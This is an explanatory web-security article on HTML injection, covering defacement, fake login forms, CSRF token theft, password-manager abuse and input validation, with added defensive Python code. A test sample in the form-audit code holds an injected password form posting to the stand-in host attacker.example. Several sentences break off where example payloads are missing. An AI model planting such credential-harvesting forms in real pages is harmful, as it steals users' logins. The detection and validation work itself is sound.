
HTML Injection Payloads

Overview of HTML Injection 

HTML is the "skeleton" of any web application: it defines the general layout and style of the hosted content. What happens if a few basic scripts damage that skeleton, or if the structure itself becomes the means of tampering with the application? In this post, we'll learn how improperly handled HTML lets attackers alter carefully built websites and steal confidential data from users.

How does HTML Injection work? 

HTML injection is an attack in which malicious HTML code is added to a website. The result can be anything from small-scale website vandalism to large-scale data breaches. Unlike other web vulnerabilities, HTML injection targets the markup language that serves as the foundation for the majority of websites.

This attack focuses on altering the structure and content of a webpage, which sets it apart from other online vulnerabilities that make use of server or database flaws. 

Typical Reasons 

One of the most frequent reasons for HTML injection is negligence. First on the list is a lack of input validation, which makes it easy for attackers to enter harmful code. Experienced attackers can also take advantage of misconfigured web servers. Finally, careless or hurried coding practices leave applications open to these attacks.

Despite their seeming technicality, these reasons are frequently the result of human mistakes. The human factor is always there, whether it's a server administrator incorrectly configuring settings or a developer ignoring a security precaution. 

Illustrations of HTML Injection 

The following are some of the most typical instances of HTML injections: 

Defacing

The most basic use of HTML injection is defacing, which alters the page's visible content. For instance, an attacker may use a stored HTML injection to add a visual advertisement for a product they intend to sell. The attacker may also inject malicious HTML for personal or political gain, to damage the page's reputation.

Exfiltration of private user data

Two more common uses of HTML injection are the construction of a form on the intended website and manipulating the user into providing confidential data there.

For example, an attacker may inject malicious code that shows a fake login form. The login and password data entered into that form would then be sent to an attacker-controlled server.

If the website uses relative URLs, the hacker could try to exploit the tag to steal data. For example, all forms would be submitted to the xyz.com website, which is controlled by the attacker, if they inject, because the web page uses relative URLs to submit forms. 

Theft of Anti-CSRF Tokens 

Additionally, using HTML injection, attackers can take anti-CSRF tokens and utilize them in a later cross-site request forgery (CSRF) attack. The hidden input type on a form is frequently used to send anti-CSRF tokens.

To exfiltrate the token, an attacker may, for instance, utilize a non-terminated tag with single quotes, like this: 

Another option is to insert a <textarea> tag. The <textarea> and <form> tags will both be implicitly closed in this case and any content that comes after the <textarea> element will be submitted.

Exfiltrating Stored Passwords in the Browser

Attackers can also incorporate forms that browser password managers will automatically fill out using HTML injections. If the attacker successfully injects the correct form, the password manager will provide the user credentials immediately. All that is needed for the form to work with multiple browsers is that the action parameter points to any host, and the input fields have the correct names and structures. 
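The fake login form and password-manager cases above both leave the same trace in the delivered page: a form with a password field whose action resolves to a host the site does not own. The following added example (not code from the original article) audits rendered markup for that condition, resolving relative actions the way a browser does, including a `<base href>` element; the host names and sample markup are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

class FormAudit(HTMLParser):
    """Record each form's action and whether it holds a password field."""

    def __init__(self, page_url):
        super().__init__()
        self.base = page_url      # URL that relative actions resolve against
        self.base_set = False
        self.forms = []
        self.current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "base" and a.get("href") and not self.base_set:
            # HTML resolves relative URLs against the first <base href>.
            self.base, self.base_set = urljoin(self.base, a["href"]), True
        elif tag == "form":
            self.current = {"action": a.get("action") or "", "password": False}
            self.forms.append(self.current)
        elif tag == "input" and self.current is not None:
            if (a.get("type") or "").lower() == "password":
                self.current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self.current = None

def offsite_credential_forms(markup, page_url, allowed_hosts):
    """Return resolved actions of password forms posting outside allowed_hosts."""
    audit = FormAudit(page_url)
    audit.feed(markup)
    audit.close()
    flagged = []
    for form in audit.forms:
        target = urljoin(audit.base, form["action"])  # resolve after full parse
        if form["password"] and urlsplit(target).hostname not in allowed_hosts:
            flagged.append(target)
    return flagged

# Constructed sample: the site's own login form plus a form inside user content.
SAMPLE_PAGE = """
<form action="/login" method="post"><input name="user"><input type="password" name="pass"></form>
<div class="comment"><form action="https://attacker.example/collect" method="post">
<input name="user"><input type="password" name="pass"></form></div>
"""
```

Run it over rendered responses in integration tests or a crawler, with `allowed_hosts` set to the hosts the application legitimately posts credentials to.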

Effects of HTML Injection 

HTML injection vulnerabilities are commonly disregarded. Even if HTML injections don't directly harm the web server or the database, they might still have detrimental effects like the following. 

An attacker may create a fake form to trick a user into entering their login credentials or to steal password information that has been stored in the browser. If the targeted user possesses certain permissions, malicious actors may be able to access the web application on an administrative level. 

If the attacker conducts a public attack, the company, organization, or even the country's reputation might be severely harmed. If a high-value page is vandalized or used as a means of spreading false information, users or clients could make unwise decisions and lose trust in your cybersecurity protocols.

The attacker may utilize HTML injection as a stepping stone to more serious attacks like CSRF. 

After inserting their HTML content into malicious URLs, the attacker emails the URLs to the victim. The user opens the link because it is hosted on a trustworthy domain, which allows the user's identity to be stolen.

HTML Injection Types 

Since HTML is considered a reasonably simple language, this attack doesn't seem to be that hard to understand or execute. There are various methods to execute this sort of assault. However, reflected and stored HTML injection are the two primary types. 

Stored HTML Injection 

A "stored HTML" attack, sometimes referred to as "Persistence", is one in which a malicious script is injected into a web application and permanently saved on the application server. When a user views the affected webpage, the application server sends the malicious script back out to that user. The browser will run the injected HTML code when the user clicks on the payload, which appears to be an official element of the website.

The most common use case for stored HTML injection is the "comment option" on blogs, which allows any user to submit input in the form of comments for the admin or other users.

Injection of HTML using DOM 

The webpage's Document Object Model (DOM), which depicts the page's structure, is the target of the assault. Attackers can insert malicious scripts that run client-side by tampering with the DOM. 

Both web developers and security experts must comprehend the DOM. It serves as a link between HTML and JavaScript, and any flaws might result in serious security lapses. The first line of defense is understanding how these assaults function. 

Reflected HTML Injection 

"Reflected HTML Injection," or "Non-Persistence Vulnerability," occurs when a web application responds to user input without first validating it. This allows a prospective attacker to embed browser-executable code within a single HTML response. It is called "non-persistent" because the malicious script is not stored on the web server, so phishing must be used to disseminate the dangerous link and trick the user.

An attacker might easily put arbitrary HTML code into a website's search textbox. If the website contains an HTML injection vulnerability, then the output page will show the HTML entities in response.

Strategies for prevention and mitigation 

Validation and Sanitization of Input 

Input validation and sanitization are the first lines of defense against HTML injection. Malicious inputs can be effectively blocked by ensuring that every user input is carefully checked against predetermined criteria. This means inspecting data types, lengths, and patterns to ensure they match expected values.
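The checks described above, applied to the search-box case from the reflected injection section, as an added example that is not part of the original article. The field policy (1 to 64 characters, a limited character set) and all function names are assumptions; the example also goes one step beyond the text by HTML-encoding values at output, which is what protects free-text fields such as comments that cannot be held to a strict pattern.

```python
import html
import re

# Assumed policy for a hypothetical search field: word characters, spaces and
# a little punctuation, 1 to 64 characters. Each field gets its own policy.
SEARCH_PATTERN = re.compile(r"[\w .,'\-]{1,64}")

class ValidationError(ValueError):
    pass

def validate_search_term(raw):
    """Check type, length and pattern; return the trimmed term or raise."""
    if not isinstance(raw, str):
        raise ValidationError("search term must be a string")
    term = raw.strip()
    if not 1 <= len(term) <= 64:
        raise ValidationError("search term must be 1-64 characters")
    if not SEARCH_PATTERN.fullmatch(term):
        raise ValidationError("search term contains disallowed characters")
    return term

def render_results_unsafe(raw):
    """The vulnerable pattern: input reflected into markup unchanged."""
    return "<p>Results for: " + raw + "</p>"

def render_results(raw):
    """Validate first, then HTML-encode at the point of output."""
    try:
        term = validate_search_term(raw)
    except ValidationError:
        return "<p>Invalid search term.</p>"
    return "<p>Results for: " + html.escape(term, quote=True) + "</p>"

def render_comment(raw, max_len=500):
    """Free text cannot use a strict pattern: bound the length and encode."""
    if not isinstance(raw, str) or not 1 <= len(raw) <= max_len:
        return "<p>Invalid comment.</p>"
    return "<p>" + html.escape(raw, quote=True) + "</p>"

SAMPLE = "<h1>injected</h1>"  # constructed input containing markup
```

Validation rejects the markup outright in the search field, while encoding lets the comment field display it as inert text; the apostrophe in a name like O'Brien passes validation and is still encoded on output.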